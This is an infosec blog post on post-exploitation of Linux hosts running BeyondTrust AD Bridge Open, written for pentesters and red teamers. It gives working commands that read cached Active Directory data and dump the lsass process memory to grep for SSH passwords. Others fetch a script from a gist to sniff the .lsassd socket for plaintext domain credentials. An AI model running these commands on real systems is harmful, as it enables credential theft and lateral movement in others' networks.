<!DOCTYPE html>
<html lang="en">
<title>BeyondTrust AD Bridge Open Post-Exploitation | vibrio&#39;s personal infosec blog</title>
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<meta http-equiv="pragma" content="no-cache">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="AD Bridge Open is an open-source community project sponsored by BeyondTrust Corporation. It is essentially a wrapper application that will facilitate the int...">
<meta name="author" content="vibrio">
<meta name="generator" content="Jekyll v3.9.3">
<link rel="canonical" href="https://blog.vibri.us/BeyondTrust-AD-Bridge-Open-Post-Exploitation/">
<link rel="stylesheet" href="/assets/css/minimal.css">
<link rel="stylesheet" href="/assets/css/classes.css">
<link rel="stylesheet" href="/assets/css/sidebar.css" media="screen and (min-width: 70em)">
<link rel="alternate" href="/feed.xml" type="application/atom+xml" title="vibrio's personal infosec blog">
<header class="icons">
<nav>
<a aria-label="Home" href="/"><svg aria-hidden="true" class="hidden"><use xlink:href="/assets/fontawesome/icons.svg#home"></use></svg><span aria-hidden="true">Home</span></a>
<a aria-label="About" href="/about/"><svg aria-hidden="true" class="hidden"><use xlink:href="/assets/fontawesome/icons.svg#address-card"></use></svg><span aria-hidden="true">About</span></a>
</nav>
<nav>
<a aria-label="Github" href="https://github.com/ricardojba"><svg aria-hidden="true"><use xlink:href="/assets/fontawesome/icons.svg#github"></use></svg><span aria-hidden="true" class="hidden">Github</span></a>
<a aria-label="LinkedIn" href="https://www.linkedin.com/in/ricardojbalmeida/"><svg aria-hidden="true"><use xlink:href="/assets/fontawesome/icons.svg#linkedin"></use></svg><span aria-hidden="true" class="hidden">LinkedIn</span></a>
<a aria-label="Subscribe" href="/feed.xml"><svg aria-hidden="true"><use xlink:href="/assets/fontawesome/icons.svg#rss"></use></svg><span aria-hidden="true" class="hidden">Subscribe</span></a>
</nav>
<div class="hidden description"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="87f1eee5f5eee8c7f0e8f5ec">[email&#160;protected]</a></div>
</header>
<article>
<header>
<h1><a href="/BeyondTrust-AD-Bridge-Open-Post-Exploitation/">BeyondTrust AD Bridge Open Post-Exploitation</a></h1><time datetime="2023-03-15T00:00:00+00:00">March 15, 2023</time>
</header>
<p><a href="https://github.com/BeyondTrust/pbis-open">AD Bridge Open</a> is an open-source community project sponsored by BeyondTrust Corporation. It is essentially a wrapper application that will facilitate the integration of *nix hosts with Microsoft Active Directory (sets up Kerberos and LDAP Auth).</p>
<p><strong>This post describes a few post-exploitation tips, were ROOT access was obtained on a Linux host that is using BeyondTrust AD Bridge Open.</strong></p>
<p>Also the post content is based on the last open source version that is available on GitHub (AD Bridge Open 9.1.0.551). The project was discontinued and moved to an enterprise closed source model in 2021.</p>
<h2 id="builtin-binaries-and-files-for-situational-awareness">Builtin binaries and files for situational awareness</h2>
<p>AD Bridge Open installs and uses several binaries that are very useful for enumerating an Active Directory environment, if the Linux box was streamlined and does not have any LDAP or SMB clients installed (those are typically present on Linux distributions).</p>
<p>The software keeps a cache file of domain users and associated Active Directory information in this file <code class="language-plaintext highlighter-rouge">/var/lib/pbis/db/lsass-adcache.filedb.DOMAIN.LOCAL</code>.</p>
<p>So without making any request to the Domain Controllers it is possible access a trove of useful information about the AD environment.</p>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-1.png" />
</p>
<p>Another interesting file is <code class="language-plaintext highlighter-rouge">/var/lib/pbis/db/lwi_events.db</code>. If the Active Directory has been hardened and the Machine Account Quota is set to zero for all regular domain accounts, by reading this file one can get the domain account that was used to join the Linux machine to the domain - again without making a single request to the Domain Controllers.</p>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-2.png" />
</p>
<p>As for useful LOLBIN’s for enumeration and situational awareness, they can all be found in the directory <code class="language-plaintext highlighter-rouge">/opt/pbis/bin/</code></p>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-3.png" />
</p>
<p>These are pretty much self explanatory:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/enum-groups</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/enum-members</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/enum-objects</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/enum-users</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/list-groups-for-user</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-by-sid</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-group-by-id</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-group-by-name</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-objects</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-user-by-id</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-user-by-name</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/ldapsearch</code></li>
</ul>
<p><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/get-dc-list DOMAIN.LOCAL</code> Will output the names and IPs of all Domain Controllers.</p>
<p><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/adtool</code> Can query and modify objects in Active Directory - eg: add user or computer accounts.</p>
<p><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/get-dc-list/update-dns</code> Registers IP addresses and the corresponding PTR records in DNS via a secure dynamic DNS update that could be handy for ADIDNS Zone poisoning.</p>
<p><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/lwio-copy</code> Is an SMB client that can be used to transfer files.</p>
<p>You can find more details about the binaries function, command flags and whatnot on the <a href="https://www.beyondtrust.com/docs/ad-bridge/getting-started/linux-admin/index.htm">official documentation</a>.</p>
<h1 id="domain-credentials-for-lateral-movement-and-privilege-escalation">Domain credentials for lateral movement and privilege escalation</h1>
<p>As with any pentesting or red teaming engagement I want to obtain Domain credentials to move laterally and/or escalate privileges.</p>
<p>SSH authentication is integrated with Active Directory using AD Bridge Open, so I can dump the LSASS process memory, run strings and grep for SSH authentications and/or passwords.</p>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-4.png" />
</p>
<p>GDB can be attached using one of the AD Bridge Open binaries,</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/opt/pbis/bin/lwsm gdb lsass
</code></pre></div></div>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-5.png" />
</p>
<p>Or I can just run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcore <span class="sb">`</span>ps aux | <span class="nb">grep</span> <span class="s1">'[l]sass'</span> | <span class="nb">awk</span> <span class="s1">'{print $2}'</span><span class="sb">`</span> <span class="o">&amp;&amp;</span> strings core.<span class="k">*</span> | <span class="nb">grep</span> <span class="nt">-C</span> 8 <span class="nt">-Hnia</span> <span class="nt">--color</span><span class="o">=</span>auto <span class="s2">"ssh"</span>
</code></pre></div></div>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-6.png" />
</p>
<p>The only issue with this method is that it’s a bit hit-and-miss with the grep “offsets”. Sometimes I get the user credential within the offsets, other times I get nothing and the credential is somewhere inside the ~1Gb memory dump file.</p>
<p>So I decided to look again at the files being used by AD Bridge Open, and found several of Unix Sockets on the directory <code class="language-plaintext highlighter-rouge">/var/lib/pbis/</code></p>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-7.png" />
</p>
<p><code class="language-plaintext highlighter-rouge">.lsassd</code> appeared interesting, so I decided to sniff its traffic.</p>
<p>I’ll need to install wireshark/tcpdump and socat and then run a small bash script to accomplish this.</p>
<p>Since I have to wait for an SSH connection, I’m going to run everything from a Tmux session. That way I can detach it and leave it running.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>yum <span class="nt">-y</span> <span class="nb">install </span>wireshark socat tmux
tmux
wget https://gist.githubusercontent.com/ricardojba/05d8ca06717292798054ca968082b70a/raw/5eea101b9054b19aa21714b2cbcbc5bc2173cdf4/unixsock-sniff.sh <span class="nt">-O</span> unixsock-sniff.sh
<span class="nb">chmod </span>755 unixsock-sniff.sh
./unixsock-sniff.sh <span class="nt">-u</span> /var/lib/pbis/.lsassd
</code></pre></div></div>
<p>If the Linux box is often accessed by users or there’s some automated scanning software that performs authenticated scans against the box (eg: Nessus), I can quickly capture an SSH login and the plain-text password.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tshark <span class="nt">-x</span> <span class="nt">-r</span> /tmp/unix_socket_dump.pcap | <span class="nb">grep</span> <span class="nt">-C</span> 8 sshd
</code></pre></div></div>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-8.png" />
</p>
<p>Pretty sure that there’s a lot that I didn’t cover or missed, but this will help get us started in a pentest or red team of *nix hosts with BeyondTrust AD Bridge Open installed.</p>
</article>
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script></html>
